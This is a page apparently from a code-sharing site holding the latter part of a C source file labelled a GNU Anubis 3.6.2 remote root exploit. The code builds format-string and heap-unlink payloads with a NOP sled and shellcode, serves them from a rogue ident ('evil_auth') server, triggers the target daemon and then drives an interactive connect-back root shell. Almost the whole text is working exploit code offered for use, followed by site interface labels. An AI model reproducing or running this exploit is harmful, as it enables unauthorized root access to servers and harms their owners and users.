📄 gnu anubis 3.6.2 remote buffer overflow root exploit.txt
字号:
u_int addrlen = sizeof(struct sockaddr_in);
struct sockaddr_in client;
int csock;
fd_set readset;
ssize_t n;
int nfd;
if (listen(lsock, 1) < 0) {
perror("** listen()");
return(-1);
}
/* Timeout */
signal(SIGALRM, signal_handler);
alarm(5);
/* Signal connect */
kill(conn, SIGUSR1);
waitpid(conn, NULL, 0);
printf("[*] Awaiting connect back\n");
if ( (csock = accept(lsock, (struct sockaddr *)&client,
&addrlen)) < 0) {
fprintf(stderr, "** Connection error\n");
return(-1);
}
alarm(0);
printf("[*] Target connected back\n\n");
wait(NULL); /* Reap of last child */
write(csock, "id\n", 3);
if ( (nfd = csock +1) > FD_SETSIZE) {
fprintf(stderr, "** SASH Error: FD_SETSIZE to small!\r\n");
return(1);
}
FD_ZERO(&readset);
FD_SET(csock, &readset);
FD_SET(STDIN_FILENO, &readset);
for (;;) {
fd_set readtmp;
memcpy(&readtmp, &readset, sizeof(readtmp));
memset(inbuf, 0x00, sizeof(inbuf));
if (select(nfd, &readtmp, NULL, NULL, NULL) < 0) {
if (errno == EINTR)
continue;
perror("select()");
return(1);
}
if (FD_ISSET(STDIN_FILENO, &readtmp)) {
if ( (n = read(STDOUT_FILENO, inbuf, sizeof(inbuf))) < 0) {
perror("read()");
break;
}
if (n == 0) break;
if (write(csock, inbuf, n) != n) {
perror("write()");
return(1);
}
}
if (FD_ISSET(csock, &readtmp)) {
if ( (n = read(csock, inbuf, sizeof(inbuf))) < 0) {
perror("read()");
break;
}
if (n == 0) break;
if (write(STDOUT_FILENO, inbuf, n) != n) {
perror("write()");
return(1);
}
}
}
return(0);
}
void
usage(char *pname)
{
int i;
printf("\nUsage: %s host[:port] targetID [Option(s)]\n", pname);
printf("\n Targets:\n");
for (i=0; targets[i].desc != NULL; i++)
printf(" %d - %s\n", i, targets[i].desc);
printf("\n Options:\n");
printf(" -b ip[:port] - Local connect back address\n");
printf(" -l retloc - Override target retloc\n");
printf(" -r ret - Override target ret\n");
printf(" -w written - Bytes written by target fmt func\n");
printf("\n");
}
int
main(int argc, char *argv[])
{
u_char buf[BUFSIZE+1];
u_char fmt[220];
char *chunk = NULL;
struct sockaddr_in taddr;
struct sockaddr_in laddr;
u_short auth_port;
struct target *tgt;
pid_t pid1, pid2;
u_int ret = 0;
int lsock;
char *pt;
int i;
printf("\n GNU Anubis 3.6.2 remote root exploit by CMN\n");
if (argc < 3) {
usage(argv[0]);
exit(EXIT_FAILURE);
}
printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
memset(&taddr, 0x00, sizeof(struct sockaddr_in));
taddr.sin_port = htons(ANUBIS_PORT);
taddr.sin_family = AF_INET;
taddr.sin_addr.s_addr = INADDR_ANY;
auth_port = htons(AUTH_PORT);
memset(&laddr, 0x00, sizeof(struct sockaddr_in));
laddr.sin_family = AF_INET;
laddr.sin_port = 0;
laddr.sin_addr.s_addr = net_localip();
if ( (pt = strchr(argv[1], ':'))) {
*pt++ = '\0';
taddr.sin_port = htons((u_short)strtoul(pt, NULL, 0));
}
if ( (long)(taddr.sin_addr.s_addr = net_inetaddr(argv[1])) == -1) {
fprintf(stderr, "Failed to resolve target host/IP\"%s\"\n",
argv[1]);
exit(EXIT_FAILURE);
}
argv++;
argc--;
i = strtoul(argv[1], NULL, 0);
if (argv[1][0] == '-'|| (i<0) ||
i>= sizeof(targets)/sizeof(struct target)-1) {
fprintf(stderr, "** Bad target ID\n");
exit(EXIT_FAILURE);
}
argv++;
argc--;
tgt = &targets[i];
while ( (i = getopt(argc, argv, "r:l:w:b:")) != -1) {
switch(i) {
case 'b': {
if ( (pt = strchr(optarg, ':'))) {
*pt++ = '\0';
laddr.sin_port = htons((u_short)strtoul(optarg,
NULL, 0));
}
if ( (long)(laddr.sin_addr.s_addr = net_inetaddr(optarg))
== -1) {
fprintf(stderr, "Failed to resolve target host/IP
\"%s\"\n", optarg);
exit(EXIT_FAILURE);
}
}
case 'r': ret = strtoul(optarg, NULL, 0); break;
case 'l': tgt->retloc = strtoul(optarg, NULL, 0); break;
case 'w': tgt->written = strtoul(optarg, NULL, 0); break;
default: exit(EXIT_FAILURE);
}
}
/* Local address */
if ( (lsock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("** socket()");
exit(EXIT_FAILURE);
}
if (bind(lsock, (struct sockaddr *)&laddr, sizeof(laddr)) < 0) {
perror("** bind()");
exit(EXIT_FAILURE);
}
/* Connect back address */
{
int len = sizeof(struct sockaddr_in);
struct sockaddr_in paddr;
if (getsockname(lsock, (struct sockaddr *)&paddr, &len) < 0) {
perror("** getsockname()");
exit(EXIT_FAILURE);
}
(*(u_short *)&tgt->code[PORT_INDEX]) = paddr.sin_port;
(*(u_int *)&tgt->code[IP_INDEX]) = paddr.sin_addr.s_addr;
printf("local addr: %s:%u\n", inet_ntoa(paddr.sin_addr),
ntohs(paddr.sin_port));
if (!(paddr.sin_port & 0xff00) || !(paddr.sin_port & 0xff00) ||
!(paddr.sin_addr.s_addr & 0xff000000) ||
!(paddr.sin_addr.s_addr & 0x00ff0000) ||
!(paddr.sin_addr.s_addr & 0x0000ff00) ||
!(paddr.sin_addr.s_addr & 0x000000ff)) {
fprintf(stderr, "** Zero byte(s) in connect back address\n");
exit(EXIT_FAILURE);
}
}
/*
* We insert a '\n' to control the size of the data
* passed on the the vulnerable function.
* But all 512 bytes are read into a static buffer, so we
* just add the shellcode after '\n' to store it.
*/
if (tgt->type == FMTSTR) {
if (!ret)
ret = tgt->bufaddr+260;
if (mkfmtstr(tgt, ret, fmt, sizeof(fmt)) < 0)
exit(EXIT_FAILURE);
memset(buf, 0x90, sizeof(buf));
memcpy(&buf[BUFSIZE-strlen(tgt->code)-4],
tgt->code, strlen(tgt->code)+1);
i = snprintf(buf, sizeof(buf), "a: USERID: a: %s\n", fmt);
if (buf[i] == '\0') buf[i] = 0x90;
}
else {
if (!ret)
ret = tgt->bufaddr+tgt->offset+24;
memset(buf, 0x90, sizeof(buf));
memcpy(&buf[sizeof(buf)-strlen(tgt->code)-4],
tgt->code, strlen(tgt->code)+1);
if ( (chunk = unlinkchunk(ret, tgt->retloc, 64/4)) == NULL)
exit(EXIT_FAILURE);
i = snprintf(buf, sizeof(buf), "a: USERID: a: %s", chunk);
if (buf[i] == '\0') buf[i] = 0x90;
/* Set free address */
*((u_int *)&buf[tgt->offset]) = tgt->bufaddr + 68;
/* Return point */
memcpy(&buf[(tgt->offset+24)], JMPCODE, sizeof(JMPCODE)-1);
buf[tgt->offset+4] = '\n';
}
printf(" Target: %s\n", tgt->desc);
printf(" Return: 0x%08x\n", ret);
printf(" Retloc: 0x%08x\n", tgt->retloc);
if (tgt->type == FMTSTR) {
printf(" offset: %u bytes%s\n", tgt->offset,
tgt->offset==1?"s":"");
printf(" Padding: %u byte%s\n", tgt->pad,
tgt->pad==1?"s":"");
printf(" Written: %u byte%s\n", tgt->written,
tgt->written==1?"s":"");
}
printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n");
if (!(ret & 0xff000000) ||
!(ret & 0x00ff0000) ||
!(ret & 0x0000ff00) ||
!(ret & 0x000000ff)) {
fprintf(stderr, "** Zero byte(s) in return address\n");
exit(EXIT_FAILURE);
}
if (!(tgt->retloc & 0xff000000) ||
!(tgt->retloc & 0x00ff0000) ||
!(tgt->retloc & 0x0000ff00) ||
!(tgt->retloc & 0x000000ff)) {
fprintf(stderr, "** Zero byte(s) in retloc\n");
exit(EXIT_FAILURE);
}
signal(SIGUSR1, signal_handler);
if ( (pid1 = fork()) < 0) {
perror("** fork()");
exit(EXIT_FAILURE);
}
/* Auth server */
if (pid1 == 0) {
kill(getppid(), SIGUSR1);
signal(SIGUSR1, signal_handler);
while (!start_auth);
if (evil_auth(auth_port, buf, strlen(buf)) != 0)
kill(getppid(), SIGTERM);
exit(EXIT_SUCCESS);
}
if ( (pid2 = fork()) < 0) {
perror("** fork()");
kill(pid1, SIGTERM);
exit(EXIT_FAILURE);
}
/* Connect to trigger */
if (pid2 == 0) {
int anubis_sock;
signal(SIGUSR1, signal_handler);
while (!connect_target);
if ( (anubis_sock = sock_connect(taddr.sin_addr.s_addr,
taddr.sin_port)) < 0) {
exit(EXIT_FAILURE);
}
exit(EXIT_SUCCESS);
}
/* Start auth */
while(!start_auth);
kill(pid1, SIGUSR1);
if (get_connectback(pid2, lsock) < 0) {
kill(0, SIGTERM);
exit(EXIT_FAILURE);
}
exit(EXIT_SUCCESS);
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -